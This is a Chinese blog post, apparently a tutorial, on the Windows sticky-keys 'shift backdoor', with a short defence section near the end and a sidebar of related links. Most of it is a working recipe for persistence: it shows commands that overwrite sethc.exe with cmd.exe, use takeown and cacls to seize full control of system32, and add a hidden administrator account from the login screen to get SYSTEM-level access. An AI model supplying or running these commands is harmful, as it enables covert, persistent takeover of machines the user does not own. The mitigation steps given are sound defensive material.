zoukankan      html  css  js  c++  java
  • shift后门

    shift快捷

    Windows的粘滞键------C:windowssystem32sethc.exe,它本是为不方便按组合键的人设计的

    Windows系统按5下shift后,Windows就执行了system32下的sethc.exe,也就是启用了粘滞键

     在进程里可以看到是以当前用户的权限运行

    但是当我们未登陆系统(停留在登陆界面)的时候 系统还不知道我们将以哪个用户登陆,所以在这个时候连续按5次shift后的话系统将会以system用户(具有管理员级别的权限)来运行sethc.exe这个程序

    后门原理

    我们可以把cmd.exe这个程序更名称sethc.exe并且把原来的sethc.exe替换掉

    在登陆界面的时候我们连续按下5吃shift键系统以system权限就会运行我们的CMD.exe

    那么我们的cmd.exe就具有了管理员权限了 如此一来 我们只要利用CMD加一个管理员用户就可以登陆进去,实现隐藏后门

    后门制作

    其制作有很多种,下面介绍一种最简单的,可以明白其原理自己扩展

    在命令行执行(需要一定的权限)

    copy C:WINDOWSsystem32cmd.exe​ C:windowssystem32sethc.exe   //如果没指定生成的文件,会直接覆盖copy的第二个参数,相当于将第二个参数换成了第一个参数,但是文件外部名称没变
    

    发现拒绝访问

    出现这样的情况我们就需要将将权限目录下的所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)命令

    注销,尝试登陆界面直接运行出系统权限的cmd命令。

    takeown /f c:windowssystem32*.*   /a /r /d y
    cacls  c:windowssystem32*.*  /T /E /G administrators:F

    目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制
    然后系统文件夹权限。

    如果提权后是system权限,需要在转化

    cacls  c:windowssystem32*.*  /T /E /G system:F

    现在可以用管理员权限访问了

    注销,来看下登陆界面是否可以5个shift调用起来shift后门

    通过命令添加为管理员登陆

    net user gkk test /add && net localgroup administrators gkk /add

    这个命令行存在时间限制,所以要快速输入命令,达到添加用户的目的。重启尝试登陆。

    防御

    禁用该功能

    C:windowssystem32sethc.exe

    C:windowssystem32dllcachesethc.exe

    (dllcache目录是隐藏的,在文件夹选项里选择"显示所有文件和文件夹"把"隐藏受系统保护的操作系统文件"的选择取消才能看得到)

    开始------->控制面板---->辅助功能选项------>设置----->取消快捷键

     

    使用权限来约束这两个文件

    就是让所有人用不了,而且直接删除sethc.exe文件,系统会自动找回

    1.删除所有组的权限

    右键属性,高级,有勾则去掉“允许父项的继承权限传播到该对象和所有子对象”的勾

     

    2.添加一个everyone组,然后设置该组的所有权限都是“拒绝”

    点击”添加“,在出现的选择用户和组中点击”立即查找“,在搜索结果中找到”Everoy“用户,并确定

    继续确定,将”Everoy“用户的权限设置为全部拒绝

    这样就禁止了安装和在此访问。当再次安装和访问时,就会出现拒绝访问

    学习文章:https://blog.csdn.net/auuuuuuuu/article/details/88902791

  • 相关阅读:
    信号量
    队列 Queue JoinableQueue
    process 多进程写法 multiprocessing
    socketserver
    scokte tcp/ip
    线程池或进程池的回调函数
    gevent 真正的协程
    巨蟒python全栈开发flask12项目开始4
    巨蟒python全栈开发flask11项目开始3
    巨蟒python全栈开发flask10 项目开始2
  • 原文地址:https://www.cnblogs.com/BOHB-yunying/p/11695140.html
Copyright © 2011-2022 走看看